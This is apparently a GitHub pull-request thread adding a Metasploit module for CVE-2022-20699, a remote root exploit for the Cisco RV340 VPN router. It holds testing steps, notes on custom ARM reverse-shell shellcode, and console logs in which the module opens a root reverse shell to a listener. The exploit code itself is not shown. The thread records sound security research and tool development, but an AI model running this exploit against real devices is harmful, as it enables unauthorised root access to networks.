Add sploit for Cisco RV340 SSL VPN - CVE-2022-20699

[pedrib]

This pull request adds an exploit for CVE-2022-20699, a fully remote root, which is exploitable over the Internet, for the Cisco RV 340 VPN Gateway router. This vulnerability was used in Pwn2Own Austin 2021 and presented at OffensiveCon 2022 by me and @rdomanski

For more info check our advisory.

Note that we need to use our own shellcode, as Metasploit doesn't have ARMLE encoders for null free shellcode. Or are we wrong? We couldn't find a way!

Anyway, running this module results in a beautiful reverse root shell.

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[gwillcox-r7]

@pedrib Given its unlikely that we will have a copy of this VPN in house, feel free to do your usual and send the PCAPs over when you have a chance 👍

[jbaines-r7]

@pedrib Given its unlikely that we will have a copy of this VPN in house, feel free to do your usual and send the PCAPs over when you have a chance 👍

I have one, and planned to test the module out over the weekend.

[pedrib]

@jbaines-r7 awesome, thank you. We tested it thoroughly on versions 1.0.03.15 to .03.24 and it worked beautifully, but external validation is always good. If you feel adventurous, try firmwares < 1.0.03.15. We tried the very first firmware released in 2017 (1.0.0-something) and that didn't work, but we might have gone too far back. The 1.0.02.-something series might work.

To test the module, do the following:

• Go the router admin page via one of the LAN ports, then VPN-> SSL VPN and turn it on the port you want to connect to (WAN1 or WAN2).
• Use dnsmasq to provide a DHCP address to the WAN port, or alternatively configure the WAN interface on the router with a fixed IP.
• reboot and wait a bit (3, 4 minutes, takes a while) so that the router is back online and no lights are blinking
• Run the sploit and pwn it!

EDIT: now that I'm thinking, it might be a good idea to add these instructions to the module docs. Those are in the works, although next week I'm a bit busy, might take a while.

[pedrib]

@gwillcox-r7 @jbaines-r7 you guys don't have ARMLE encoders for shellcode right? Or did I miss something?

EDIT: @timwr told me the ARMLE payloads might be null free already, have to admit we didn't even think of that. However we would have to guarantee that they are always null free for any lhost / lport combination

[pedrib]

Ran a few tests, Metasploit DOES NOT produce ARMLE null free shellcode, and there are no encoders to do so, hence we need to stick to our own shellcode.

We also realised that this exploit has a bug in a very specific corner case.
It doesn't work for LHOST addresses with a "0" in any of the octets, such as X.0.Y.Z, X.Y.0.Z and X.Y.Z.0 (and combinations of those such as X.0.0.Y, etc) which are valid IP non rfc1918 addresses. For any other IP addresses, it should work flawlessly.

We need to modify the shellcode for this specific case, with a similar trick like we do to null the AF_INET struct byte (check the shellcode comment I just added), however bear in mind this will take a while since we're both pretty busy right now.

[jbaines-r7]

Validated on 1.0.03.20. Quick and clean, nice exploit ❤️

msf6 > use exploit/linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set LHOST 192.168.1.114
LHOST => 192.168.1.114
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 10.0.0.8:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > run

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 10.0.0.8:8443 - 10.0.0.8:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Command shell session 1 opened (192.168.1.114:4444 -> 192.168.1.1:60250 ) at 2022-02-14 06:56:53 -0800

id
uid=0(root) gid=0(root)

I'll be happy to test against a wider range of firmware, if desired, once code reviews have been done and the code is in a state that is more likely to be landed.

[pedrib]

@jbaines-r7 good to know! Thanks for testing. First let's try and fix that bug with ".0" addresses, once that is done, we'll need to test again a variety of scenarios to check if there's any breakage.

[bwatters-r7]

Let's make sure we have all attribution requirements included.

[pedrib]

What do you mean?

[pedrib]

This is the source of the shellcode: https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/

[bwatters-r7]

Sorry; I must have missed this response. We wanted to be super specific and make sure that the shellcode was not licensed in a way that would prevent us from having it in the project.

[pedrib]

hey all, the shellcode is now fixed! It should work flawless for IP addresses with 0 in any of the 2nd, 3rd or 4th octets. Please test!

[pedrib]

hey everyone, I made a major update - turns out we don't need to flush the caches beforehand, so our shellcode just got smaller. I made some better comments on the module, and added the docs. Please test again!

[pedrib]

we're all green woohoo! ready to merge?

[gwillcox-r7]

@jbaines-r7 Any chance you can take another look at this given you have a test target? @bwatters-r7 Does the changes look good from your end?

[jbaines-r7]

Yup! I'll add it to my TODO for this week. I think I'm booked up with writing today :( But tomorrow/Wednesday, I'll work this out again.

[jbaines-r7]

The most recent version doesn't appear to be working for me:

msf6 > use exploits/linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set RHOST 10.0.0.5
RHOST => 10.0.0.5
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 10.0.0.5:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > run

[*] Started reverse TCP handler on 10.0.0.2:4444 
[*] 10.0.0.5:8443 - 10.0.0.5:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Exploit completed, but no session was created.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > 

10.0.0.5 is the Cisco device on the WAN side and my box (10.0.0.2) should, in theory, be reachable. The version tested was 1.0.03.20.

[pedrib]

@jbaines-r7 sorry I completely missed this, thought I had responded.
The module has a 40% failure rate, can you please try 10 times and check how many fail?
Note that you don't need to reboot the device each time, the service will respawn after 1 minute or so.

[razoidr]

Hi, could you please share date (are the any?) when the module will be released?

[bcoles]

Hi, could you please share date (are the any?) when the module will be released?

There's no ETA. In the interim you can download the module files here:

https://github.com/rapid7/metasploit-framework/pull/16169/files

[jbaines-r7]

Sorry for the delay @pedrib. @gwillcox-r7 this is working. Below there is output and a video. From my point of view, there are minor code changes that would be good but I don't see any reason to hold this up any longer than I've already held it up 🤷 I'll leave my RV340 running so I can retest anything quickly.

msf6 > use linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set RHOST 10.0.0.31
RHOST => 10.0.0.31
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 10.0.0.31:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > set LHOST 10.0.0.28
LHOST => 10.0.0.28
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > run

[*] Started reverse TCP handler on 10.0.0.28:4444 
[*] 10.0.0.31:8443 - 10.0.0.31:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.31:48738 ) at 2022-05-11 06:31:48 -0700

id
uid=0(root) gid=0(root)

https://www.youtube.com/watch?v=w3wh95MndcQ

[gwillcox-r7]

Will land this once tests pass, thanks for testing this @jbaines-r7! Updates were mainly to reduce ranking down to GoodRanking since the exploit isn't 100% reliable so ExcellentRanking isn't appropriate, and it doesn't detect the target version so GreatRanking wasn't appropriate either, and to fix up some minor formatting issues in the markdown for the documentation. Also added in the AutoCheck library so we can automatically detect if target is a likely candidate or not prior to exploiting.

[gwillcox-r7]

Release Notes

A new module has been added in which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the root user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.

[pedrib]

Thanks everyone, you're awesome!